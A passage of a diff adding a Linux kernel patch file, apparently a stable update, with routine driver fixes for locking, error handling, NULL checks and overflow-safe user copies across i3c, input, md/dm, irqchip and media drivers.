++++ b/drivers/i3c/master/mipi-i3c-hci/dma.c
+@@ -345,6 +345,8 @@ static void hci_dma_unmap_xfer(struct i3c_hci *hci,
+ 
+ 	for (i = 0; i < n; i++) {
+ 		xfer = xfer_list + i;
++		if (!xfer->data)
++			continue;
+ 		dma_unmap_single(&hci->master.dev,
+ 				 xfer->data_dma, xfer->data_len,
+ 				 xfer->rnw ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
+@@ -450,10 +452,9 @@ static bool hci_dma_dequeue_xfer(struct i3c_hci *hci,
+ 		/*
+ 		 * We're deep in it if ever this condition is ever met.
+ 		 * Hardware might still be writing to memory, etc.
+-		 * Better suspend the world than risking silent corruption.
+ 		 */
+ 		dev_crit(&hci->master.dev, "unable to abort the ring\n");
+-		BUG();
++		WARN_ON(1);
+ 	}
+ 
+ 	for (i = 0; i < n; i++) {
+diff --git a/drivers/infiniband/hw/hfi1/chip.c b/drivers/infiniband/hw/hfi1/chip.c
+index 194cac40da653..c560552244ae8 100644
+--- a/drivers/infiniband/hw/hfi1/chip.c
++++ b/drivers/infiniband/hw/hfi1/chip.c
+@@ -13183,15 +13183,16 @@ static void read_mod_write(struct hfi1_devdata *dd, u16 src, u64 bits,
+ {
+ 	u64 reg;
+ 	u16 idx = src / BITS_PER_REGISTER;
++	unsigned long flags;
+ 
+-	spin_lock(&dd->irq_src_lock);
++	spin_lock_irqsave(&dd->irq_src_lock, flags);
+ 	reg = read_csr(dd, CCE_INT_MASK + (8 * idx));
+ 	if (set)
+ 		reg |= bits;
+ 	else
+ 		reg &= ~bits;
+ 	write_csr(dd, CCE_INT_MASK + (8 * idx), reg);
+-	spin_unlock(&dd->irq_src_lock);
++	spin_unlock_irqrestore(&dd->irq_src_lock, flags);
+ }
+ 
+ /**
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs.c b/drivers/infiniband/ulp/rtrs/rtrs.c
+index 716ec7baddefd..d71b1d83e9ffb 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs.c
+@@ -255,7 +255,7 @@ static int create_cq(struct rtrs_con *con, int cq_vector, int nr_cqe,
+ static int create_qp(struct rtrs_con *con, struct ib_pd *pd,
+ 		     u32 max_send_wr, u32 max_recv_wr, u32 max_sge)
+ {
+-	struct ib_qp_init_attr init_attr = {NULL};
++	struct ib_qp_init_attr init_attr = {};
+ 	struct rdma_cm_id *cm_id = con->cm_id;
+ 	int ret;
+ 
+diff --git a/drivers/input/input-mt.c b/drivers/input/input-mt.c
+index 14b53dac1253b..6b04a674f832a 100644
+--- a/drivers/input/input-mt.c
++++ b/drivers/input/input-mt.c
+@@ -46,6 +46,9 @@ int input_mt_init_slots(struct input_dev *dev, unsigned int num_slots,
+ 		return 0;
+ 	if (mt)
+ 		return mt->num_slots != num_slots ? -EINVAL : 0;
++	/* Arbitrary limit for avoiding too large memory allocation. */
++	if (num_slots > 1024)
++		return -EINVAL;
+ 
+ 	mt = kzalloc(struct_size(mt, slots, num_slots), GFP_KERNEL);
+ 	if (!mt)
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 5b50475ec4140..e9eb9554dd7bd 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -83,6 +83,7 @@ static inline void i8042_write_command(int val)
+ #define SERIO_QUIRK_KBDRESET		BIT(12)
+ #define SERIO_QUIRK_DRITEK		BIT(13)
+ #define SERIO_QUIRK_NOPNP		BIT(14)
++#define SERIO_QUIRK_FORCENORESTORE	BIT(15)
+ 
+ /* Quirk table for different mainboards. Options similar or identical to i8042
+  * module parameters.
+@@ -1149,18 +1150,10 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
+ 	{
+-		/*
+-		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
+-		 * the keyboard very laggy for ~5 seconds after boot and
+-		 * sometimes also after resume.
+-		 * However both are required for the keyboard to not fail
+-		 * completely sometimes after boot or resume.
+-		 */
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "N150CU"),
+ 		},
+-		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+-					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++		.driver_data = (void *)(SERIO_QUIRK_FORCENORESTORE)
+ 	},
+ 	{
+ 		.matches = {
+@@ -1685,6 +1678,8 @@ static void __init i8042_check_quirks(void)
+ 	if (quirks & SERIO_QUIRK_NOPNP)
+ 		i8042_nopnp = true;
+ #endif
++	if (quirks & SERIO_QUIRK_FORCENORESTORE)
++		i8042_forcenorestore = true;
+ }
+ #else
+ static inline void i8042_check_quirks(void) {}
+@@ -1718,7 +1713,7 @@ static int __init i8042_platform_init(void)
+ 
+ 	i8042_check_quirks();
+ 
+-	pr_debug("Active quirks (empty means none):%s%s%s%s%s%s%s%s%s%s%s%s%s\n",
++	pr_debug("Active quirks (empty means none):%s%s%s%s%s%s%s%s%s%s%s%s%s%s\n",
+ 		i8042_nokbd ? " nokbd" : "",
+ 		i8042_noaux ? " noaux" : "",
+ 		i8042_nomux ? " nomux" : "",
+@@ -1738,10 +1733,11 @@ static int __init i8042_platform_init(void)
+ 		"",
+ #endif
+ #ifdef CONFIG_PNP
+-		i8042_nopnp ? " nopnp" : "");
++		i8042_nopnp ? " nopnp" : "",
+ #else
+-		"");
++		"",
+ #endif
++		i8042_forcenorestore ? " forcenorestore" : "");
+ 
+ 	retval = i8042_pnp_init();
+ 	if (retval)
+diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c
+index 6dac7c1853a54..29340f8095bb2 100644
+--- a/drivers/input/serio/i8042.c
++++ b/drivers/input/serio/i8042.c
+@@ -115,6 +115,10 @@ module_param_named(nopnp, i8042_nopnp, bool, 0);
+ MODULE_PARM_DESC(nopnp, "Do not use PNP to detect controller settings");
+ #endif
+ 
++static bool i8042_forcenorestore;
++module_param_named(forcenorestore, i8042_forcenorestore, bool, 0);
++MODULE_PARM_DESC(forcenorestore, "Force no restore on s3 resume, copying s2idle behaviour");
++
+ #define DEBUG
+ #ifdef DEBUG
+ static bool i8042_debug;
+@@ -1232,7 +1236,7 @@ static int i8042_pm_suspend(struct device *dev)
+ {
+ 	int i;
+ 
+-	if (pm_suspend_via_firmware())
++	if (!i8042_forcenorestore && pm_suspend_via_firmware())
+ 		i8042_controller_reset(true);
+ 
+ 	/* Set up serio interrupts for system wakeup. */
+@@ -1248,7 +1252,7 @@ static int i8042_pm_suspend(struct device *dev)
+ 
+ static int i8042_pm_resume_noirq(struct device *dev)
+ {
+-	if (!pm_resume_via_firmware())
++	if (i8042_forcenorestore || !pm_resume_via_firmware())
+ 		i8042_interrupt(0, NULL);
+ 
+ 	return 0;
+@@ -1271,7 +1275,7 @@ static int i8042_pm_resume(struct device *dev)
+ 	 * not restore the controller state to whatever it had been at boot
+ 	 * time, so we do not need to do anything.
+ 	 */
+-	if (!pm_suspend_via_firmware())
++	if (i8042_forcenorestore || !pm_suspend_via_firmware())
+ 		return 0;
+ 
+ 	/*
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index 3620bdb5200f2..a7a952bbfdc28 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -4476,8 +4476,6 @@ static int its_vpe_irq_domain_alloc(struct irq_domain *domain, unsigned int virq
+ 	struct page *vprop_page;
+ 	int base, nr_ids, i, err = 0;
+ 
+-	BUG_ON(!vm);
+-
+ 	bitmap = its_lpi_alloc(roundup_pow_of_two(nr_irqs), &base, &nr_ids);
+ 	if (!bitmap)
+ 		return -ENOMEM;
+diff --git a/drivers/irqchip/irq-renesas-rzg2l.c b/drivers/irqchip/irq-renesas-rzg2l.c
+index be71459c7465a..70279ca7e6278 100644
+--- a/drivers/irqchip/irq-renesas-rzg2l.c
++++ b/drivers/irqchip/irq-renesas-rzg2l.c
+@@ -132,7 +132,7 @@ static void rzg2l_irqc_irq_disable(struct irq_data *d)
+ 
+ 		raw_spin_lock(&priv->lock);
+ 		reg = readl_relaxed(priv->base + TSSR(tssr_index));
+-		reg &= ~(TSSEL_MASK << TSSEL_SHIFT(tssr_offset));
++		reg &= ~(TIEN << TSSEL_SHIFT(tssr_offset));
+ 		writel_relaxed(reg, priv->base + TSSR(tssr_index));
+ 		raw_spin_unlock(&priv->lock);
+ 	}
+@@ -145,7 +145,6 @@ static void rzg2l_irqc_irq_enable(struct irq_data *d)
+ 
+ 	if (hw_irq >= IRQC_TINT_START && hw_irq < IRQC_NUM_IRQ) {
+ 		struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
+-		unsigned long tint = (uintptr_t)d->chip_data;
+ 		u32 offset = hw_irq - IRQC_TINT_START;
+ 		u32 tssr_offset = TSSR_OFFSET(offset);
+ 		u8 tssr_index = TSSR_INDEX(offset);
+@@ -153,7 +152,7 @@ static void rzg2l_irqc_irq_enable(struct irq_data *d)
+ 
+ 		raw_spin_lock(&priv->lock);
+ 		reg = readl_relaxed(priv->base + TSSR(tssr_index));
+-		reg |= (TIEN | tint) << TSSEL_SHIFT(tssr_offset);
++		reg |= TIEN << TSSEL_SHIFT(tssr_offset);
+ 		writel_relaxed(reg, priv->base + TSSR(tssr_index));
+ 		raw_spin_unlock(&priv->lock);
+ 	}
+diff --git a/drivers/md/dm-clone-metadata.c b/drivers/md/dm-clone-metadata.c
+index c43d55672bce0..47c1fa7aad8b5 100644
+--- a/drivers/md/dm-clone-metadata.c
++++ b/drivers/md/dm-clone-metadata.c
+@@ -465,11 +465,6 @@ static void __destroy_persistent_data_structures(struct dm_clone_metadata *cmd)
+ 
+ /*---------------------------------------------------------------------------*/
+ 
+-static size_t bitmap_size(unsigned long nr_bits)
+-{
+-	return BITS_TO_LONGS(nr_bits) * sizeof(long);
+-}
+-
+ static int __dirty_map_init(struct dirty_map *dmap, unsigned long nr_words,
+ 			    unsigned long nr_regions)
+ {
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 4376754816abe..f9df723866da9 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1156,8 +1156,26 @@ static int do_resume(struct dm_ioctl *param)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
+ 		if (param->flags & DM_NOFLUSH_FLAG)
+ 			suspend_flags |= DM_SUSPEND_NOFLUSH_FLAG;
+-		if (!dm_suspended_md(md))
+-			dm_suspend(md, suspend_flags);
++		if (!dm_suspended_md(md)) {
++			r = dm_suspend(md, suspend_flags);
++			if (r) {
++				down_write(&_hash_lock);
++				hc = dm_get_mdptr(md);
++				if (hc && !hc->new_map) {
++					hc->new_map = new_map;
++					new_map = NULL;
++				} else {
++					r = -ENXIO;
++				}
++				up_write(&_hash_lock);
++				if (new_map) {
++					dm_sync_table(md);
++					dm_table_destroy(new_map);
++				}
++				dm_put(md);
++				return r;
++			}
++		}
+ 
+ 		old_size = dm_get_size(md);
+ 		old_map = dm_swap_table(md, new_map);
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 29270f6f272f6..ddd44a7f79dbf 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2511,7 +2511,7 @@ static int dm_wait_for_bios_completion(struct mapped_device *md, unsigned int ta
+ 			break;
+ 
+ 		if (signal_pending_state(task_state, current)) {
+-			r = -EINTR;
++			r = -ERESTARTSYS;
+ 			break;
+ 		}
+ 
+@@ -2536,7 +2536,7 @@ static int dm_wait_for_completion(struct mapped_device *md, unsigned int task_st
+ 			break;
+ 
+ 		if (signal_pending_state(task_state, current)) {
+-			r = -EINTR;
++			r = -ERESTARTSYS;
+ 			break;
+ 		}
+ 
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index b87c6ef0da8ab..297c86f5c70b5 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -7614,11 +7614,6 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 
+ 	mddev = bdev->bd_disk->private_data;
+ 
+-	if (!mddev) {
+-		BUG();
+-		goto out;
+-	}
+-
+ 	/* Some actions do not requires the mutex */
+ 	switch (cmd) {
+ 	case GET_ARRAY_INFO:
+diff --git a/drivers/md/persistent-data/dm-space-map-metadata.c b/drivers/md/persistent-data/dm-space-map-metadata.c
+index 0d1fcdf29c835..769bb70d37d59 100644
+--- a/drivers/md/persistent-data/dm-space-map-metadata.c
++++ b/drivers/md/persistent-data/dm-space-map-metadata.c
+@@ -274,7 +274,7 @@ static void sm_metadata_destroy(struct dm_space_map *sm)
+ {
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+ 
+-	kfree(smm);
++	kvfree(smm);
+ }
+ 
+ static int sm_metadata_get_nr_blocks(struct dm_space_map *sm, dm_block_t *count)
+@@ -768,7 +768,7 @@ struct dm_space_map *dm_sm_metadata_init(void)
+ {
+ 	struct sm_metadata *smm;
+ 
+-	smm = kmalloc(sizeof(*smm), GFP_KERNEL);
++	smm = kvmalloc(sizeof(*smm), GFP_KERNEL);
+ 	if (!smm)
+ 		return ERR_PTR(-ENOMEM);
+ 
+diff --git a/drivers/md/raid5-cache.c b/drivers/md/raid5-cache.c
+index eb66d0bfe39d2..4b9585875a669 100644
+--- a/drivers/md/raid5-cache.c
++++ b/drivers/md/raid5-cache.c
+@@ -327,8 +327,9 @@ void r5l_wake_reclaim(struct r5l_log *log, sector_t space);
+ void r5c_check_stripe_cache_usage(struct r5conf *conf)
+ {
+ 	int total_cached;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+-	if (!r5c_is_writeback(conf->log))
++	if (!r5c_is_writeback(log))
+ 		return;
+ 
+ 	total_cached = atomic_read(&conf->r5c_cached_partial_stripes) +
+@@ -344,7 +345,7 @@ void r5c_check_stripe_cache_usage(struct r5conf *conf)
+ 	 */
+ 	if (total_cached > conf->min_nr_stripes * 1 / 2 ||
+ 	    atomic_read(&conf->empty_inactive_list_nr) > 0)
+-		r5l_wake_reclaim(conf->log, 0);
++		r5l_wake_reclaim(log, 0);
+ }
+ 
+ /*
+@@ -353,7 +354,9 @@ void r5c_check_stripe_cache_usage(struct r5conf *conf)
+  */
+ void r5c_check_cached_full_stripe(struct r5conf *conf)
+ {
+-	if (!r5c_is_writeback(conf->log))
++	struct r5l_log *log = READ_ONCE(conf->log);
++
++	if (!r5c_is_writeback(log))
+ 		return;
+ 
+ 	/*
+@@ -363,7 +366,7 @@ void r5c_check_cached_full_stripe(struct r5conf *conf)
+ 	if (atomic_read(&conf->r5c_cached_full_stripes) >=
+ 	    min(R5C_FULL_STRIPE_FLUSH_BATCH(conf),
+ 		conf->chunk_sectors >> RAID5_STRIPE_SHIFT(conf)))
+-		r5l_wake_reclaim(conf->log, 0);
++		r5l_wake_reclaim(log, 0);
+ }
+ 
+ /*
+@@ -396,7 +399,7 @@ void r5c_check_cached_full_stripe(struct r5conf *conf)
+  */
+ static sector_t r5c_log_required_to_flush_cache(struct r5conf *conf)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	if (!r5c_is_writeback(log))
+ 		return 0;
+@@ -449,7 +452,7 @@ static inline void r5c_update_log_state(struct r5l_log *log)
+ void r5c_make_stripe_write_out(struct stripe_head *sh)
+ {
+ 	struct r5conf *conf = sh->raid_conf;
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	BUG_ON(!r5c_is_writeback(log));
+ 
+@@ -491,7 +494,7 @@ static void r5c_handle_parity_cached(struct stripe_head *sh)
+  */
+ static void r5c_finish_cache_stripe(struct stripe_head *sh)
+ {
+-	struct r5l_log *log = sh->raid_conf->log;
++	struct r5l_log *log = READ_ONCE(sh->raid_conf->log);
+ 
+ 	if (log->r5c_journal_mode == R5C_JOURNAL_MODE_WRITE_THROUGH) {
+ 		BUG_ON(test_bit(STRIPE_R5C_CACHING, &sh->state));
+@@ -692,7 +695,7 @@ static void r5c_disable_writeback_async(struct work_struct *work)
+ 
+ 	/* wait superblock change before suspend */
+ 	wait_event(mddev->sb_wait,
+-		   conf->log == NULL ||
++		   !READ_ONCE(conf->log) ||
+ 		   (!test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags) &&
+ 		    (locked = mddev_trylock(mddev))));
+ 	if (locked) {
+@@ -1151,7 +1154,7 @@ static void r5l_run_no_space_stripes(struct r5l_log *log)
+ static sector_t r5c_calculate_new_cp(struct r5conf *conf)
+ {
+ 	struct stripe_head *sh;
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	sector_t new_cp;
+ 	unsigned long flags;
+ 
+@@ -1159,12 +1162,12 @@ static sector_t r5c_calculate_new_cp(struct r5conf *conf)
+ 		return log->next_checkpoint;
+ 
+ 	spin_lock_irqsave(&log->stripe_in_journal_lock, flags);
+-	if (list_empty(&conf->log->stripe_in_journal_list)) {
++	if (list_empty(&log->stripe_in_journal_list)) {
+ 		/* all stripes flushed */
+ 		spin_unlock_irqrestore(&log->stripe_in_journal_lock, flags);
+ 		return log->next_checkpoint;
+ 	}
+-	sh = list_first_entry(&conf->log->stripe_in_journal_list,
++	sh = list_first_entry(&log->stripe_in_journal_list,
+ 			      struct stripe_head, r5c);
+ 	new_cp = sh->log_start;
+ 	spin_unlock_irqrestore(&log->stripe_in_journal_lock, flags);
+@@ -1399,7 +1402,7 @@ void r5c_flush_cache(struct r5conf *conf, int num)
+ 	struct stripe_head *sh, *next;
+ 
+ 	lockdep_assert_held(&conf->device_lock);
+-	if (!conf->log)
++	if (!READ_ONCE(conf->log))
+ 		return;
+ 
+ 	count = 0;
+@@ -1420,7 +1423,7 @@ void r5c_flush_cache(struct r5conf *conf, int num)
+ 
+ static void r5c_do_reclaim(struct r5conf *conf)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	struct stripe_head *sh;
+ 	int count = 0;
+ 	unsigned long flags;
+@@ -1549,7 +1552,7 @@ static void r5l_reclaim_thread(struct md_thread *thread)
+ {
+ 	struct mddev *mddev = thread->mddev;
+ 	struct r5conf *conf = mddev->private;
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	if (!log)
+ 		return;
+@@ -1589,7 +1592,7 @@ void r5l_quiesce(struct r5l_log *log, int quiesce)
+ 
+ bool r5l_log_disk_error(struct r5conf *conf)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	/* don't allow write if journal disk is missing */
+ 	if (!log)
+@@ -2633,7 +2636,7 @@ int r5c_try_caching_write(struct r5conf *conf,
+ 			  struct stripe_head_state *s,
+ 			  int disks)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	int i;
+ 	struct r5dev *dev;
+ 	int to_cache = 0;
+@@ -2800,7 +2803,7 @@ void r5c_finish_stripe_write_out(struct r5conf *conf,
+ 				 struct stripe_head *sh,
+ 				 struct stripe_head_state *s)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	int i;
+ 	int do_wakeup = 0;
+ 	sector_t tree_index;
+@@ -2939,7 +2942,7 @@ int r5c_cache_data(struct r5l_log *log, struct stripe_head *sh)
+ /* check whether this big stripe is in write back cache. */
+ bool r5c_big_stripe_cached(struct r5conf *conf, sector_t sect)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	sector_t tree_index;
+ 	void *slot;
+ 
+@@ -3047,14 +3050,14 @@ int r5l_start(struct r5l_log *log)
+ void r5c_update_on_rdev_error(struct mddev *mddev, struct md_rdev *rdev)
+ {
+ 	struct r5conf *conf = mddev->private;
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	if (!log)
+ 		return;
+ 
+ 	if ((raid5_calc_degraded(conf) > 0 ||
+ 	     test_bit(Journal, &rdev->flags)) &&
+-	    conf->log->r5c_journal_mode == R5C_JOURNAL_MODE_WRITE_BACK)
++	    log->r5c_journal_mode == R5C_JOURNAL_MODE_WRITE_BACK)
+ 		schedule_work(&log->disable_writeback_work);
+ }
+ 
+@@ -3143,7 +3146,7 @@ int r5l_init_log(struct r5conf *conf, struct md_rdev *rdev)
+ 	spin_lock_init(&log->stripe_in_journal_lock);
+ 	atomic_set(&log->stripe_in_journal_count, 0);
+ 
+-	conf->log = log;
++	WRITE_ONCE(conf->log, log);
+ 
+ 	set_bit(MD_HAS_JOURNAL, &conf->mddev->flags);
+ 	return 0;
+@@ -3171,7 +3174,7 @@ void r5l_exit_log(struct r5conf *conf)
+ 	 * 'reconfig_mutex' is held by caller, set 'confg->log' to NULL to
+ 	 * ensure disable_writeback_work wakes up and exits.
+ 	 */
+-	conf->log = NULL;
++	WRITE_ONCE(conf->log, NULL);
+ 	wake_up(&conf->mddev->sb_wait);
+ 	flush_work(&log->disable_writeback_work);
+ 
+diff --git a/drivers/media/dvb-core/dvb_frontend.c b/drivers/media/dvb-core/dvb_frontend.c
+index fce0e20940780..a1a3dbb0e7388 100644
+--- a/drivers/media/dvb-core/dvb_frontend.c
++++ b/drivers/media/dvb-core/dvb_frontend.c
+@@ -2160,7 +2160,8 @@ static int dvb_frontend_handle_compat_ioctl(struct file *file, unsigned int cmd,
+ 		if (!tvps->num || (tvps->num > DTV_IOCTL_MAX_MSGS))
+ 			return -EINVAL;
+ 
+-		tvp = memdup_user(compat_ptr(tvps->props), tvps->num * sizeof(*tvp));
++		tvp = memdup_array_user(compat_ptr(tvps->props),
++					tvps->num, sizeof(*tvp));
+ 		if (IS_ERR(tvp))
+ 			return PTR_ERR(tvp);
+ 
+@@ -2191,7 +2192,8 @@ static int dvb_frontend_handle_compat_ioctl(struct file *file, unsigned int cmd,
+ 		if (!tvps->num || (tvps->num > DTV_IOCTL_MAX_MSGS))
+ 			return -EINVAL;
+ 
+-		tvp = memdup_user(compat_ptr(tvps->props), tvps->num * sizeof(*tvp));
++		tvp = memdup_array_user(compat_ptr(tvps->props),
++					tvps->num, sizeof(*tvp));
+ 		if (IS_ERR(tvp))
+ 			return PTR_ERR(tvp);
+ 
+@@ -2368,7 +2370,8 @@ static int dvb_get_property(struct dvb_frontend *fe, struct file *file,
+ 	if (!tvps->num || tvps->num > DTV_IOCTL_MAX_MSGS)
+ 		return -EINVAL;
+ 
+-	tvp = memdup_user((void __user *)tvps->props, tvps->num * sizeof(*tvp));
++	tvp = memdup_array_user((void __user *)tvps->props,
++				tvps->num, sizeof(*tvp));
+ 	if (IS_ERR(tvp))
+ 		return PTR_ERR(tvp);
+ 
+@@ -2446,7 +2449,8 @@ static int dvb_frontend_handle_ioctl(struct file *file,
+ 		if (!tvps->num || (tvps->num > DTV_IOCTL_MAX_MSGS))
+ 			return -EINVAL;
+ 
+-		tvp = memdup_user((void __user *)tvps->props, tvps->num * sizeof(*tvp));
++		tvp = memdup_array_user((void __user *)tvps->props,
++					tvps->num, sizeof(*tvp));
+ 		if (IS_ERR(tvp))
+ 			return PTR_ERR(tvp);
+ 
+diff --git a/drivers/media/pci/cx23885/cx23885-video.c b/drivers/media/pci/cx23885/cx23885-video.c
+index 9af2c5596121c..51d7d720ec48b 100644
+--- a/drivers/media/pci/cx23885/cx23885-video.c
++++ b/drivers/media/pci/cx23885/cx23885-video.c
+@@ -1354,6 +1354,10 @@ int cx23885_video_register(struct cx23885_dev *dev)
+ 	/* register Video device */
+ 	dev->video_dev = cx23885_vdev_init(dev, dev->pci,
+ 		&cx23885_video_template, "video");
++	if (!dev->video_dev) {
++		err = -ENOMEM;
++		goto fail_unreg;
++	}
+ 	dev->video_dev->queue = &dev->vb2_vidq;
+ 	dev->video_dev->device_caps = V4L2_CAP_READWRITE | V4L2_CAP_STREAMING |
+ 				      V4L2_CAP_AUDIO | V4L2_CAP_VIDEO_CAPTURE;
+@@ -1382,6 +1386,10 @@ int cx23885_video_register(struct cx23885_dev *dev)
+ 	/* register VBI device */
+ 	dev->vbi_dev = cx23885_vdev_init(dev, dev->pci,
+ 		&cx23885_vbi_template, "vbi");
++	if (!dev->vbi_dev) {
++		err = -ENOMEM;
++		goto fail_unreg;
++	}
+ 	dev->vbi_dev->queue = &dev->vb2_vbiq;
+ 	dev->vbi_dev->device_caps = V4L2_CAP_READWRITE | V4L2_CAP_STREAMING |
+ 				    V4L2_CAP_AUDIO | V4L2_CAP_VBI_CAPTURE;
+diff --git a/drivers/media/pci/solo6x10/solo6x10-offsets.h b/drivers/media/pci/solo6x10/solo6x10-offsets.h
+index f414ee1316f29..fdbb817e63601 100644
+--- a/drivers/media/pci/solo6x10/solo6x10-offsets.h
++++ b/drivers/media/pci/solo6x10/solo6x10-offsets.h
+@@ -57,16 +57,16 @@
+ #define SOLO_MP4E_EXT_ADDR(__solo) \
+ 	(SOLO_EREF_EXT_ADDR(__solo) + SOLO_EREF_EXT_AREA(__solo))
+ #define SOLO_MP4E_EXT_SIZE(__solo) \
+-	max((__solo->nr_chans * 0x00080000),				\
+-	    min(((__solo->sdram_size - SOLO_MP4E_EXT_ADDR(__solo)) -	\
+-		 __SOLO_JPEG_MIN_SIZE(__solo)), 0x00ff0000))
++	clamp(__solo->sdram_size - SOLO_MP4E_EXT_ADDR(__solo) -	\
++	      __SOLO_JPEG_MIN_SIZE(__solo),			\
++	      __solo->nr_chans * 0x00080000, 0x00ff0000)
+ 
+ #define __SOLO_JPEG_MIN_SIZE(__solo)		(__solo->nr_chans * 0x00080000)
+ #define SOLO_JPEG_EXT_ADDR(__solo) \
+ 		(SOLO_MP4E_EXT_ADDR(__solo) + SOLO_MP4E_EXT_SIZE(__solo))
+ #define SOLO_JPEG_EXT_SIZE(__solo) \
+-	max(__SOLO_JPEG_MIN_SIZE(__solo),				\
+-	    min((__solo->sdram_size - SOLO_JPEG_EXT_ADDR(__solo)), 0x00ff0000))
++	clamp(__solo->sdram_size - SOLO_JPEG_EXT_ADDR(__solo),	\
++	      __SOLO_JPEG_MIN_SIZE(__solo), 0x00ff0000)
+ 
+ #define SOLO_SDRAM_END(__solo) \
+ 	(SOLO_JPEG_EXT_ADDR(__solo) + SOLO_JPEG_EXT_SIZE(__solo))
+diff --git a/drivers/media/platform/qcom/venus/pm_helpers.c b/drivers/media/platform/qcom/venus/pm_helpers.c
+index 48c9084bb4dba..a1b127caa90a7 100644
+--- a/drivers/media/platform/qcom/venus/pm_helpers.c
++++ b/drivers/media/platform/qcom/venus/pm_helpers.c
+@@ -870,7 +870,7 @@ static int vcodec_domains_get(struct venus_core *core)
+ 		pd = dev_pm_domain_attach_by_name(dev,
+ 						  res->vcodec_pmdomains[i]);
+ 		if (IS_ERR_OR_NULL(pd))
+-			return PTR_ERR(pd) ? : -ENODATA;
++			return pd ? PTR_ERR(pd) : -ENODATA;
+ 		core->pmdomains[i] = pd;
+ 	}
+ 
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
+index f62703cebb77c..4b4c129c09e70 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
+@@ -1297,7 +1297,7 @@ static int enc_post_frame_start(struct s5p_mfc_ctx *ctx)
+ 	if (ctx->state == MFCINST_FINISHING && ctx->ref_queue_cnt == 0)
+ 		src_ready = false;
+ 	if (!src_ready || ctx->dst_queue_cnt == 0)
+-		clear_work_bit(ctx);
++		clear_work_bit_irqsave(ctx);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/radio/radio-isa.c b/drivers/media/radio/radio-isa.c
+index c591c0851fa28..ad49151f5ff09 100644
+--- a/drivers/media/radio/radio-isa.c
++++ b/drivers/media/radio/radio-isa.c
+@@ -36,7 +36,7 @@ static int radio_isa_querycap(struct file *file, void  *priv,
+ 
+ 	strscpy(v->driver, isa->drv->driver.driver.name, sizeof(v->driver));
+ 	strscpy(v->card, isa->drv->card, sizeof(v->card));
+-	snprintf(v->bus_info, sizeof(v->bus_info), "ISA:%s", isa->v4l2_dev.name);
++	snprintf(v->bus_info, sizeof(v->bus_info), "ISA:%s", dev_name(isa->v4l2_dev.dev));
+ 	return 0;
+ }
+ 
+diff --git a/drivers/memory/stm32-fmc2-ebi.c b/drivers/memory/stm32-fmc2-ebi.c
+index ffec26a99313b..5c387d32c078f 100644
+--- a/drivers/memory/stm32-fmc2-ebi.c
++++ b/drivers/memory/stm32-fmc2-ebi.c
+@@ -179,8 +179,11 @@ static int stm32_fmc2_ebi_check_mux(struct stm32_fmc2_ebi *ebi,
+ 				    int cs)
+ {
+ 	u32 bcr;
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if (bcr & FMC2_BCR_MTYP)
+ 		return 0;
+@@ -193,8 +196,11 @@ static int stm32_fmc2_ebi_check_waitcfg(struct stm32_fmc2_ebi *ebi,
+ 					int cs)
+ {
+ 	u32 bcr, val = FIELD_PREP(FMC2_BCR_MTYP, FMC2_BCR_MTYP_NOR);
++	int ret;
